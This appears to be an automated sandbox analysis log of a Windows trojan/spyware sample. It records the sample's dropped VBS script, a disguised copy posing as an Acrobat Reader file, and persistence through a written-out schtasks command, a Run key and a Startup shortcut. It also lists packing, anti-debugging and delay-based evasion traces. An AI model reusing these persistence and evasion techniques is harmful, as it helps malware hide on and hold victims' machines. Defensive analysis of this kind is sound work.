                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
Source: C:\Users\user\Desktop\bf-p2b.exe | File created: C:\Users\user\AppData\Roaming\Windata
Source: C:\Users\user\Desktop\bf-p2b.exe | File created: C:\Users\user\AppData\Local\Temp\JWPING.vbs
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/3@0/1
Source: C:\Users\user\Desktop\bf-p2b.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00B4EA85
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4D712 GetLastError,FormatMessageW, 0_2_00B4D712
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B46F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_00B46F5B
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B031F2 FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00B031F2
Source: C:\Users\user\Desktop\bf-p2b.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs
Source: bf-p2b.exe | Static file information: File size 1049600 > 1048576
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B5020C pushfd ; retf 0_2_00B50215
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6C6CC push esi; ret 0_2_00B6C6CE
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B27795 push ecx; ret 0_2_00B277A8
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4BB9D push FFFFFF8Bh; iretd 0_2_00B4BB9F
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2CB5D push edi; ret 0_2_00B2CB5F
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2CC76 push esi; ret 0_2_00B2CC78
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B08D99 push edi; retn 0000h 0_2_00B08D9B
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2CE51 push esi; ret 0_2_00B2CE53
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2CF3A push edi; ret 0_2_00B2CF3C
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B08F0E push F7FFFFFFh; retn 0000h 0_2_00B08F13
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F2020C pushfd ; retf 5_2_00F20215
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF7795 push ecx; ret 5_2_00EF77A8
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1BB9D push FFFFFF8Bh; iretd 5_2_00F1BB9F
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFCB5D push edi; ret 5_2_00EFCB5F
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFCC76 push esi; ret 5_2_00EFCC78
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED8D99 push edi; retn 0000h 5_2_00ED8D9B
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFCE51 push esi; ret 5_2_00EFCE53
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFCF3A push edi; ret 5_2_00EFCF3C
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED8F0E push F7FFFFFFh; retn 0000h 5_2_00ED8F13
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00C830E0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_00C830E0
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\bf-p2b.exe | File created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe

                Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
Source: C:\Users\user\Desktop\bf-p2b.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWPING.lnk
Source: C:\Users\user\Desktop\bf-p2b.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JWPING
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B67F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F37F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B21E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\bf-p2b.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\bf-p2b.exe TID: 7424 | Thread sleep time: -49760s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\bf-p2b.exe | Thread sleep count: Count: 4976 delay: -10
                Source: C:\Users\user\Desktop\bf-p2b.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: Yara match | File source: 00000003.00000002.2921107184.0000000003740000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2920013586.0000000003398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wscript.exe PID: 7492, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\JWPING.vbs, type: DROPPED
                Source: C:\Users\user\Desktop\bf-p2b.exe | Window / User API: threadDelayed 4976
                Source: C:\Users\user\Desktop\bf-p2b.exe | Window / User API: foregroundWindowGot 1657
                Source: C:\Users\user\Desktop\bf-p2b.exe | API coverage: 7.1 %
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | API coverage: 4.3 %
                Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Users\user\Desktop\bf-p2b.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1DD92 GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4FD47 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F22044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F2219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F224A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F16B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEDD92 GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1FD47 FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F16E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\bf-p2b.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\bf-p2b.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\bf-p2b.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | API call chain: ExitProcess graph end node
                Source: bf-p2b.exe, 00000000.00000002.2921561992.0000000001511000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: bf-p2b.exe, 00000000.00000002.2921561992.0000000001511000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B0374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B346D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00C830E0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B3B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B5703C BlockInput
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B28E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B28E19 SetUnhandledExceptionFilter
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF8E19 SetUnhandledExceptionFilter
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: winmgmts:\\localhost\root\securitycenter2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y7za0ue6ls7d[memstr_7f4230d4-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;amemstr_c2e06bcc-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;float;float;imemstr_ad80e2d4-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h7el5fx7mb8rfmemstr_9cd8633b-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y7dj7nn6vkmemstr_e3653ebe-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2kg6hp2ztmemstr_ba08f264-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h4gn3zk4pmmemstr_9ab7cb2a-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0lv4qb3qkmemstr_bb764f90-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;float;memstr_b066a178-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;float;int;kmemstr_ff11f869-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0jy3ny2mkmemstr_794bbe7c-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y5fb7pn8sy6t>memstr_6e7c727a-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h0wf1xa4k`<memstr_49c87cd0-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2fa4ey3ykmemstr_0496fa21-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ole2ae94be238c88f4459cc1555a5f9memstr_923b5c25-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uu?e!memstr_058de2a7-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dbu$memstr_386c7bbf-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dpe@2dtmemstr_975946d7-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\dnsapi.dllmemstr_205d1c95-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\bcrypt.dllmemstr_5b3d4ecb-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\mswsock.dllumemstr_3707cf9f-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [6x^~memstr_13b17203-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ole96e6340821868812800f81c0e609!memstr_e2082f7b-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dbulmemstr_c7bcc4f3-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l/bupmemstr_1c3cd2a4-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 800w246587797w246587796w246587779memstr_a32aa82a-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587827w246587826w246587779w246587784w246587777w246587781w246587838w246587777w246587796w246587807w246587824w246587805w246587798w246587806w246587779w246587800w246587781w246587801w246587804w246587809w246587779w246587806w246587783w246587800w246587797w246587796w246587779memstr_d18943bf-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erroromemstr_335338dc-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '(`n~memstr_5f3469af-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >@@m~memstr_61f36f2e-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: error0p~memstr_cf2796c2-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfo~memstr_6a36a2b0-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfxmemstr_2e42c3fc-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0 memstr_0e313f96-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x*`dkmemstr_ebeb94e3-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: systemmemstr_4dce5609-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: registry(memstr_777f4187-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: smss.exehmemstr_321568d3-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csrss.exe(memstr_7ebe1a4f-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wininit.exememstr_368b0948-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #r0lmmemstr_171b56e7-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csrss.exememstr_2c4ee1f2-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: winlogon.exememstr_4ce37aa9-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: z3zbymemstr_a311dcd9-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: services.exememstr_51ba4e07-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: n`q`q`qz,memstr_7419f775-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 73h[mmemstr_397b4899-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lsass.exememstr_d6d70bf1-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exememstr_5a18077e-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fontdrvhost.exememstr_614a84aa-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exe(memstr_fb1b4822-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,p#p&p#fmemstr_27f55bfc-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exe memstr_abbbb038-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dwm.exememstr_356e406d-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: p, )pmemstr_e0027f89-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exehmemstr_ad43e079-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: s4nrsmemstr_55a179b6-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @[`p xmemstr_6bd14c6c-f
